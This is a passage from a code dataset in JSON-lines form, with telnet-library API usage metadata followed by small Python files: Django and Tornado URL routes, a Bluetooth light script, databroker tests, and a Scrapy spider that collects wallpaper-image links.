"line_number": 536, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 537, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 537, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 538, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 538, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 538, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 538, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 549, "usage_type": "argument"}, {"api_name": "telnetlib.SB", "line_number": 551, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 551, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 552, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 552, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 553, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 553, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 553, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 553, "usage_type": "name"}, {"api_name": "telnetlib.EOR", "line_number": 564, "usage_type": "argument"}, {"api_name": "telnetlib.IAC", "line_number": 565, "usage_type": "name"}, {"api_name": "telnetlib.LFLOW", "line_number": 572, "usage_type": "argument"}, {"api_name": "telnetlib.IAC", "line_number": 576, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 576, "usage_type": "name"}, {"api_name": "telnetlib.LFLOW", "line_number": 576, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 576, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 585, "usage_type": "argument"}, {"api_name": "telnetlib.IAC", "line_number": 591, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 591, 
"usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 591, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 593, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 593, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 604, "usage_type": "argument"}, {"api_name": "slc.Forwardmask", "line_number": 608, "usage_type": "argument"}, {"api_name": "telnetlib.LINEMODE", "line_number": 609, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 609, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 613, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 613, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 613, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 614, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 614, "usage_type": "name"}, {"api_name": "telnetlib.BRK", "line_number": 627, "usage_type": "name"}, {"api_name": "telnetlib.IP", "line_number": 627, "usage_type": "name"}, {"api_name": "telnetlib.AO", "line_number": 627, "usage_type": "name"}, {"api_name": "telnetlib.AYT", "line_number": 627, "usage_type": "name"}, {"api_name": "telnetlib.EC", "line_number": 627, "usage_type": "name"}, {"api_name": "telnetlib.EL", "line_number": 627, "usage_type": "name"}, {"api_name": "telnetlib.NOP", "line_number": 628, "usage_type": "name"}, {"api_name": "telnetlib.DM", "line_number": 628, "usage_type": "name"}, {"api_name": "telnetlib.GA", "line_number": 628, "usage_type": "name"}, {"api_name": "slc.NSLC", "line_number": 768, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 811, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 811, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 811, "usage_type": "name"}, {"api_name": "telnetlib.NEW_ENVIRON", "line_number": 812, "usage_type": "name"}, {"api_name": "telnetlib.NAWS", "line_number": 812, "usage_type": "name"}, {"api_name": "telnetlib.LOGOUT", "line_number": 812, "usage_type": "name"}, {"api_name": "telnetlib.CHARSET", "line_number": 812, "usage_type": "name"}, {"api_name": "telnetlib.SNDLOC", "line_number": 812, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 872, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 875, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 877, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 880, "usage_type": "argument"}, {"api_name": "telnetlib.LOGOUT", "line_number": 880, "usage_type": "argument"}, {"api_name": "telnetlib.WONT", "line_number": 881, "usage_type": "name"}, {"api_name": "telnetlib.ECHO", "line_number": 902, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 904, "usage_type": "name"}, {"api_name": "telnetlib.LOGOUT", "line_number": 906, "usage_type": "name"}, {"api_name": "telnetlib.TM", "line_number": 908, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 909, "usage_type": "argument"}, {"api_name": "telnetlib.TM", "line_number": 909, "usage_type": "argument"}, {"api_name": "telnetlib.LOGOUT", "line_number": 910, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 911, "usage_type": "argument"}, {"api_name": "telnetlib.LOGOUT", "line_number": 911, "usage_type": "name"}, {"api_name": "telnetlib.ECHO", "line_number": 912, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 912, "usage_type": "name"}, {"api_name": 
"telnetlib.BINARY", "line_number": 912, "usage_type": "name"}, {"api_name": "telnetlib.SGA", "line_number": 912, "usage_type": "name"}, {"api_name": "telnetlib.LFLOW", "line_number": 912, "usage_type": "name"}, {"api_name": "telnetlib.EXOPL", "line_number": 912, "usage_type": "name"}, {"api_name": "telnetlib.EOR", "line_number": 912, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 914, "usage_type": "argument"}, {"api_name": "telnetlib.STATUS", "line_number": 916, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 918, "usage_type": "argument"}, {"api_name": "telnetlib.STATUS", "line_number": 918, "usage_type": "argument"}, {"api_name": "telnetlib.WONT", "line_number": 923, "usage_type": "argument"}, {"api_name": "telnetlib.LOGOUT", "line_number": 935, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 937, "usage_type": "argument"}, {"api_name": "telnetlib.LOGOUT", "line_number": 937, "usage_type": "name"}, {"api_name": "telnetlib.BINARY", "line_number": 965, "usage_type": "name"}, {"api_name": "telnetlib.SGA", "line_number": 965, "usage_type": "name"}, {"api_name": "telnetlib.ECHO", "line_number": 965, "usage_type": "name"}, {"api_name": "telnetlib.NAWS", "line_number": 965, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 965, "usage_type": "name"}, {"api_name": "telnetlib.EOR", "line_number": 965, "usage_type": "name"}, {"api_name": "telnetlib.SNDLOC", "line_number": 965, "usage_type": "name"}, {"api_name": "telnetlib.ECHO", "line_number": 966, "usage_type": "name"}, {"api_name": "telnetlib.NAWS", "line_number": 968, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 968, "usage_type": "name"}, {"api_name": "telnetlib.SNDLOC", "line_number": 968, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 973, "usage_type": "argument"}, {"api_name": "telnetlib.NAWS", "line_number": 974, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 974, "usage_type": "name"}, {"api_name": "telnetlib.SNDLOC", "line_number": 974, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 975, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 976, "usage_type": "name"}, {"api_name": "telnetlib.TM", "line_number": 979, "usage_type": "name"}, {"api_name": "telnetlib.TM", "line_number": 980, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 980, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 983, "usage_type": "name"}, {"api_name": "telnetlib.TM", "line_number": 983, "usage_type": "name"}, {"api_name": "telnetlib.LOGOUT", "line_number": 984, "usage_type": "name"}, {"api_name": "telnetlib.LOGOUT", "line_number": 985, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 987, "usage_type": "argument"}, {"api_name": "telnetlib.LOGOUT", "line_number": 987, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 988, "usage_type": "name"}, {"api_name": "telnetlib.LFLOW", "line_number": 991, "usage_type": "name"}, {"api_name": "telnetlib.LFLOW", "line_number": 992, "usage_type": "name"}, {"api_name": "telnetlib.NEW_ENVIRON", "line_number": 996, "usage_type": "name"}, {"api_name": "telnetlib.CHARSET", "line_number": 999, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 1002, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 1003, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 1007, "usage_type": "name"}, 
{"api_name": "telnetlib.TTYPE", "line_number": 1008, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 1012, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 1017, "usage_type": "argument"}, {"api_name": "telnetlib.TM", "line_number": 1031, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 1031, "usage_type": "name"}, {"api_name": "telnetlib.TM", "line_number": 1033, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 1035, "usage_type": "name"}, {"api_name": "telnetlib.TM", "line_number": 1035, "usage_type": "name"}, {"api_name": "telnetlib.LOGOUT", "line_number": 1036, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 1039, "usage_type": "name"}, {"api_name": "telnetlib.LOGOUT", "line_number": 1039, "usage_type": "name"}, {"api_name": "telnetlib.WONT", "line_number": 1041, "usage_type": "argument"}, {"api_name": "telnetlib.LOGOUT", "line_number": 1041, "usage_type": "name"}, {"api_name": "telnetlib.theNULL", "line_number": 1061, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 1065, "usage_type": "name"}, {"api_name": "telnetlib.LFLOW", "line_number": 1065, "usage_type": "name"}, {"api_name": "telnetlib.NAWS", "line_number": 1065, "usage_type": "name"}, {"api_name": "telnetlib.SNDLOC", "line_number": 1065, "usage_type": "name"}, {"api_name": "telnetlib.NEW_ENVIRON", "line_number": 1066, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 1066, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 1066, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 1066, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 1066, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 1067, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 1068, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 1071, "usage_type": "name"}, {"api_name": "telnetlib.LFLOW", "line_number": 1072, "usage_type": "name"}, {"api_name": "telnetlib.NAWS", "line_number": 1074, "usage_type": "name"}, {"api_name": "telnetlib.SNDLOC", "line_number": 1076, "usage_type": "name"}, {"api_name": "telnetlib.NEW_ENVIRON", "line_number": 1078, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 1080, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 1082, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 1084, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 1086, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 1112, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 1126, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 1129, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 1133, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 1136, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 1140, "usage_type": "name"}, {"api_name": "telnetlib.NEW_ENVIRON", "line_number": 1147, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 1154, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 1156, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 1157, "usage_type": "name"}, {"api_name": "telnetlib.theNULL", "line_number": 1164, "usage_type": "name"}, {"api_name": "telnetlib.SNDLOC", "line_number": 1182, "usage_type": "name"}, {"api_name": "telnetlib.NAWS", 
"line_number": 1185, "usage_type": "name"}, {"api_name": "telnetlib.NAWS", "line_number": 1189, "usage_type": "name"}, {"api_name": "telnetlib.LFLOW", "line_number": 1194, "usage_type": "name"}, {"api_name": "telnetlib.LFLOW", "line_number": 1195, "usage_type": "argument"}, {"api_name": "telnetlib.LINEMODE", "line_number": 1201, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 1207, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 1207, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 1207, "usage_type": "name"}, {"api_name": "telnetlib.WONT", "line_number": 1207, "usage_type": "name"}, {"api_name": "slc.SLC_definition", "line_number": 1232, "usage_type": "call"}, {"api_name": "telnetlib.LINEMODE", "line_number": 1239, "usage_type": "argument"}, {"api_name": "telnetlib.DO", "line_number": 1242, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 1242, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 1246, "usage_type": "argument"}, {"api_name": "telnetlib.WILL", "line_number": 1249, "usage_type": "name"}, {"api_name": "telnetlib.WONT", "line_number": 1249, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 1252, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 1255, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 1257, "usage_type": "name"}, {"api_name": "telnetlib.WONT", "line_number": 1257, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 1258, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 1259, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 1259, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 1260, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 1261, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 1271, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 1271, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 1272, "usage_type": "argument"}, {"api_name": "collections.deque", "line_number": 1274, "usage_type": "call"}, {"api_name": "telnetlib.IAC", "line_number": 1275, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 1275, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 1275, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 1279, "usage_type": "name"}, {"api_name": "telnetlib.WONT", "line_number": 1279, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 1285, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 1286, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 1287, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 1288, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 1289, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 1289, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 1293, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 1293, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 1294, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 1294, "usage_type": "name"}, {"api_name": "slc.NSLC", "line_number": 1309, "usage_type": "name"}, {"api_name": "slc.SLC_definition", "line_number": 1311, "usage_type": "call"}, {"api_name": "slc.SLC_NOSUPPORT", "line_number": 1311, "usage_type": "argument"}, {"api_name": 
"slc._POSIX_VDISABLE", "line_number": 1311, "usage_type": "argument"}, {"api_name": "telnetlib.theNULL", "line_number": 1321, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 1334, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 1334, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 1339, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 1339, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 1339, "usage_type": "name"}, {"api_name": "slc.NSLC", "line_number": 1345, "usage_type": "name"}, {"api_name": "slc.name_slc_command", "line_number": 1366, "usage_type": "call"}, {"api_name": "slc.name_slc_command", "line_number": 1380, "usage_type": "call"}, {"api_name": "slc.NSLC", "line_number": 1383, "usage_type": "name"}, {"api_name": "slc.SLC_nosupport", "line_number": 1385, "usage_type": "call"}, {"api_name": "telnetlib.theNULL", "line_number": 1389, "usage_type": "name"}, {"api_name": "slc.SLC_DEFAULT", "line_number": 1390, "usage_type": "name"}, {"api_name": "slc.SLC_VARIABLE", "line_number": 1395, "usage_type": "name"}, {"api_name": "slc.SLC_NOSUPPORT", "line_number": 1426, "usage_type": "name"}, {"api_name": "slc.SLC_nosupport", "line_number": 1429, "usage_type": "call"}, {"api_name": "slc.SLC_ACK", "line_number": 1430, "usage_type": "argument"}, {"api_name": "slc.SLC_DEFAULT", "line_number": 1434, "usage_type": "name"}, {"api_name": "slc.SLC_DEFAULT", "line_number": 1436, "usage_type": "name"}, {"api_name": "slc.SLC_NOSUPPORT", "line_number": 1440, "usage_type": "argument"}, {"api_name": "slc.DEFAULT_SLC_TAB.get", "line_number": 1443, "usage_type": "call"}, {"api_name": "slc.DEFAULT_SLC_TAB", "line_number": 1443, "usage_type": "name"}, {"api_name": "slc.DEFAULT_SLC_TAB.get", "line_number": 1445, "usage_type": "call"}, {"api_name": "slc.DEFAULT_SLC_TAB", "line_number": 1445, "usage_type": "name"}, {"api_name": "slc.SLC_nosupport", "line_number": 1446, "usage_type": "call"}, {"api_name": "telnetlib.theNULL", "line_number": 1452, "usage_type": "name"}, {"api_name": "slc.SLC_ACK", "line_number": 1455, "usage_type": "argument"}, {"api_name": "slc.SLC_DEFAULT", "line_number": 1462, "usage_type": "name"}, {"api_name": "slc.SLC_ACK", "line_number": 1466, "usage_type": "argument"}, {"api_name": "slc.SLC_CANTCHANGE", "line_number": 1468, "usage_type": "name"}, {"api_name": "slc.SLC_NOSUPPORT", "line_number": 1470, "usage_type": "argument"}, {"api_name": "slc.SLC_CANTCHANGE", "line_number": 1475, "usage_type": "name"}, {"api_name": "slc.DEFAULT_SLC_TAB.get", "line_number": 1476, "usage_type": "call"}, {"api_name": "slc.DEFAULT_SLC_TAB", "line_number": 1476, "usage_type": "name"}, {"api_name": "slc.SLC_nosupport", "line_number": 1477, "usage_type": "call"}, {"api_name": "telnetlib.BINARY", "line_number": 1498, "usage_type": "argument"}, {"api_name": "telnetlib.theNULL", "line_number": 1502, "usage_type": "name"}, {"api_name": "telnetlib.theNULL", "line_number": 1506, "usage_type": "name"}, {"api_name": "slc.Forwardmask", "line_number": 1517, "usage_type": "call"}]} diff --git a/1002.jsonl b/1002.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2b94b9d8d4f040b9f4843301d68e94cb8c929c60 --- /dev/null +++ b/1002.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:018ccf94dd59a5333209817b02250a2c736f53eec1950a61e960e2e01c0deac6 +size 42225610 diff --git a/1015.jsonl b/1015.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..9ea129986d71bda2a9d63d9a6550041a01d9d601 --- /dev/null +++ b/1015.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9482f42a5123c647adfeaacef62d54b1cad548d32de5405ca32ccc348f68910 +size 56526860 diff --git a/1019.jsonl b/1019.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..69d00ce4a999f0e4adbd867ca8fb8082c5883b46 --- /dev/null +++ b/1019.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b91212dece5ad796ce1058fccafa63653da5cf78e651efc289c44381c635a3ba +size 65397505 diff --git a/102.jsonl b/102.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fcf2f5ff46f8b134339f8bf1b8b391a8d812cb4d --- /dev/null +++ b/102.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cd512ea776938c20266c1e21475672acc35ea17066321c074efa263967d022b1 +size 58368120 diff --git a/1020.jsonl b/1020.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ca6a3fe186578ebcaf71e68c0b389c7096d6763d --- /dev/null +++ b/1020.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:83ac41d1f132cd5652b10ff9d0031c8b4152ea062f9ec51aebc87edab62342cb +size 12182997 diff --git a/1037.jsonl b/1037.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..75fc2c970d2b5ec19d506fecf2d6533c6b3054f7 --- /dev/null +++ b/1037.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0681a98d7b8d7ae78eebe9349018de9696aefd905cc667a34f127dfc4cf1ab71 +size 58461757 diff --git a/1039.jsonl b/1039.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..101a5c289be2e3a3eaaffa005eb23605d61f4c46 --- /dev/null +++ b/1039.jsonl @@ -0,0 +1,426 @@ +{"seq_id": "42213343", "text": "from django.conf.urls import url\nfrom . 
import views\n\nurlpatterns = [\n url(r'^$', views.IndexView, name='index'),\n url(r'^resources/$', views.ResourceView, name='resources'),\n url(r'^(?P[0-9]+)/rtn/$', views.RoutineView, name='RoutineView'),\n url(r'^result/(?P[0-9]+)/(?P[0-9]+)/$', views.ResultView, name='results'),\n # url(r'^feedback/$',views.FeedbackView,name='feedback'),\n\n]\n", "sub_path": "myKcmit/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 416, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.conf.urls.url", "line_number": 5, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}]} +{"seq_id": "503034547", "text": "#!/usr/bin/python\n# coding=utf-8\n# author:ldx\n\nfrom tornado.web import url\nfrom api import *\n\nurls=[\n # Cloud instance related URLs\n url(r'/vms$', InstancesHandler),\n url(r'/single-instance/(?P.*)$', SingleInstanceHandler),\n url(r'/single-instance-action/(?P.*)$', SingleInstanceActionHandler),\n url(r'/nova-services$', NovaServicesHandler),\n\n # Cloud instance availability zones\n url(r'/nova-az$', InstancesHandler),\n\n # Cloud instance flavor (template) related URLs\n url(r'/flavors$', FlavorsHandler),\n url(r'/single-flavor/(?P.*)$', SingleFlavorHandler),\n\n # Cloud instance monitoring data\n url(r'/instance_monitor_data$', InstanceMonitorHandler),\n ]\n", "sub_path": "cloud_api/compute_api/handlers/compute/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 672, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "tornado.web.url", "line_number": 10, "usage_type": "call"}, {"api_name": "tornado.web.url", "line_number": 11, "usage_type": "call"}, {"api_name": "tornado.web.url", "line_number": 12, "usage_type": "call"}, {"api_name": "tornado.web.url", "line_number": 13, "usage_type": "call"}, {"api_name": "tornado.web.url", "line_number": 16, "usage_type": "call"}, {"api_name": "tornado.web.url", "line_number": 19, "usage_type": "call"}, {"api_name": "tornado.web.url", "line_number": 20, "usage_type": "call"}, {"api_name": "tornado.web.url", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "175273750", "text": "from modules.BluetoothLightController import BluetoothLightController\r\nimport time\r\n\r\nif __name__ == '__main__':\r\n\r\n # Bluetooth Light MAC Addresses\r\n ctrl = BluetoothLightController(\r\n [\r\n 'C4:BE:84:51:A6:BC', # Behind TV\r\n 'C4:BE:84:51:CE:6F', # Desk-Left\r\n 'C4:BE:84:51:DA:D7' # Behind-Bed\r\n ]\r\n )\r\n\r\n while True:\r\n # Uncomment a mode to enable it.\r\n #ctrl.orb()\r\n #ctrl.turn_on()\r\n #ctrl.turn_off()\r\n ctrl.orb_night()\r\n", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 521, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "modules.BluetoothLightController.BluetoothLightController", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "590158601", "text": "import time as ttime\nimport uuid\n\nimport numpy as np\nimport pytest\nfrom filestore.test.utils import fs_setup, fs_teardown\nfrom metadatastore.commands import insert_run_start\nfrom metadatastore.test.utils import mds_setup, mds_teardown\nfrom numpy.testing.utils import assert_array_equal\n\nfrom databroker import DataBroker as db\nfrom databroker.pims_readers import Images, 
get_images\nfrom ..examples.sample_data import image_and_scalar\nfrom ..utils.diagnostics import watermark\n\n\n@pytest.fixture(scope='module')\ndef image_uid():\n rs = insert_run_start(time=ttime.time(), scan_id=105,\n owner='stepper', beamline_id='example',\n uid=str(uuid.uuid4()), cat='meow')\n image_and_scalar.run(run_start_uid=rs)\n return rs\n\n\ndef setup_module(module):\n mds_setup()\n fs_setup()\n\n\ndef teardown_module(module):\n mds_teardown()\n fs_teardown()\n\n\ndef test_watermark():\n result = watermark()\n assert result\n\n\ndef test_pims_images_old_api(image_uid):\n header = db[image_uid]\n images = Images(header, 'img')\n images[:5] # smoke test\n assert images.pixel_type == np.float64\n assert_array_equal(images.frame_shape, images[0].shape)\n assert len(images) == image_and_scalar.num1\n\n\ndef test_pims_images(image_uid):\n header = db[image_uid]\n images = get_images(header, 'img')\n images[:5] # smoke test\n assert images.pixel_type == np.float64\n assert_array_equal(images.frame_shape, images[0].shape)\n assert len(images) == image_and_scalar.num1\n\n", "sub_path": "databroker/tests/test_misc.py", "file_name": "test_misc.py", "file_ext": "py", "file_size_in_byte": 1530, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "metadatastore.commands.insert_run_start", "line_number": 19, "usage_type": "call"}, {"api_name": "time.time", "line_number": 19, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 21, "usage_type": "call"}, {"api_name": "examples.sample_data.image_and_scalar.run", "line_number": 22, "usage_type": "call"}, {"api_name": "examples.sample_data.image_and_scalar", "line_number": 22, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 17, "usage_type": "call"}, {"api_name": "metadatastore.test.utils.mds_setup", "line_number": 27, "usage_type": "call"}, {"api_name": "filestore.test.utils.fs_setup", "line_number": 28, "usage_type": "call"}, {"api_name": "metadatastore.test.utils.mds_teardown", "line_number": 32, "usage_type": "call"}, {"api_name": "filestore.test.utils.fs_teardown", "line_number": 33, "usage_type": "call"}, {"api_name": "utils.diagnostics.watermark", "line_number": 37, "usage_type": "call"}, {"api_name": "databroker.DataBroker", "line_number": 42, "usage_type": "name"}, {"api_name": "databroker.pims_readers.Images", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.testing.utils.assert_array_equal", "line_number": 46, "usage_type": "call"}, {"api_name": "examples.sample_data.image_and_scalar.num1", "line_number": 47, "usage_type": "attribute"}, {"api_name": "examples.sample_data.image_and_scalar", "line_number": 47, "usage_type": "name"}, {"api_name": "databroker.DataBroker", "line_number": 51, "usage_type": "name"}, {"api_name": "databroker.pims_readers.get_images", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.testing.utils.assert_array_equal", "line_number": 55, "usage_type": "call"}, {"api_name": "examples.sample_data.image_and_scalar.num1", "line_number": 56, "usage_type": "attribute"}, {"api_name": "examples.sample_data.image_and_scalar", "line_number": 56, "usage_type": "name"}]} +{"seq_id": "344219439", "text": "import scrapy\nfrom meinvPro.items import MeinvproItem\n\n\nclass MeinvSpider(scrapy.Spider):\n name = 'meinv'\n # allowed_domains = 
['www.xxx.com']\n start_urls = ['http://pic.netbian.com/4kdongwu/']\n\n url = 'http://pic.netbian.com/4kdongwu/index_%d.html'\n page_num = 2\n\n # Parse the data on a detail page\n def parse_detail(self, response):\n item = response.meta['item']\n img_name = response.xpath('//*[@id=\"main\"]/div[2]/div[1]/div[1]/h1/text()').extract_first()\n img_size = response.xpath('//*[@id=\"main\"]/div[2]/div[2]/div[2]/p[3]/span/text() | //*[@id=\"main\"]/div[2]/div[2]/div[3]/p[3]/span/text()').extract_first()\n item['img_name'] = img_name\n item['img_size'] = img_size\n yield item\n\n # Parse the index page\n def parse(self, response):\n li_list = response.xpath('//*[@id=\"main\"]/div[3]/ul/li')\n\n for li in li_list:\n img_href = 'http://pic.netbian.com' + li.xpath('./a/@href').extract_first()\n img_src = 'http://pic.netbian.com' + li.xpath('./a/img/@src').extract_first()\n\n item = MeinvproItem() # one item object per scraped record\n item['img_src'] = img_src\n yield scrapy.Request(url=img_href, callback=self.parse_detail, meta={'item':item}) # pass the item along with the request\n\n # Crawl the remaining pages\n if self.page_num <= 20:\n new_url = format(self.url%self.page_num)\n self.page_num += 1\n yield scrapy.Request(url=new_url, callback=self.parse)", "sub_path": "meinvPro/meinvPro/spiders/meinv.py", "file_name": "meinv.py", "file_ext": "py", "file_size_in_byte": 1483, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": 